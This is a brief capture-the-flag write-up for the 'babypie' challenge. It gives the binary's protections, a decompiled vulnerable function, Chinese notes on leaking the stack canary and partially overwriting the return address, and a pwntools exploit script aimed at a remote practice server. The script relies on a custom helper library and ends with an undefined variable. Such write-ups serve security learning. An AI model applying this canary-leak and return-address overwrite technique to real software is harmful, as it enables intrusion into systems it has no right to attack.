linkctf_2018.7_babypie
Arch: amd64-64-little
RELRO: Partial RELRO
Stack: Canary found
NX: NX enabled
PIE: PIE enabled
64位保护全开
__int64 sub_960()
{
__int64 buf[6]; // [rsp+0h] [rbp-30h] BYREF
buf[5] = __readfsqword(0x28u);
setvbuf(stdin, 0LL, 2, 0LL);
setvbuf(_bss_start, 0LL, 2, 0LL);
memset(buf, 0, 32);
puts("Input your Name:");
read(0, buf, 0x30uLL);
printf("Hello %s:\n", (const char *)buf);
read(0, buf, 0x60uLL);
return 0LL;
}
第一次read,直接把canary泄露出来
然后第二次
返回地址跟后门差距不大,直接覆盖返回地址的低位即可
from pwn import*
from Yapack import *
r,elf=rec("node4.buuoj.cn",26096,"./pwn",10)
context(os='linux', arch='amd64',log_level='debug')
sa(b'Name:',b'a'*0x28+b'b')
ru(b'b')
can=get_canary()
li(can)
pl=cyclic(0x28)+p64(can)+p64(0)+b'\x42'
sa(b':',pl)
ia(c)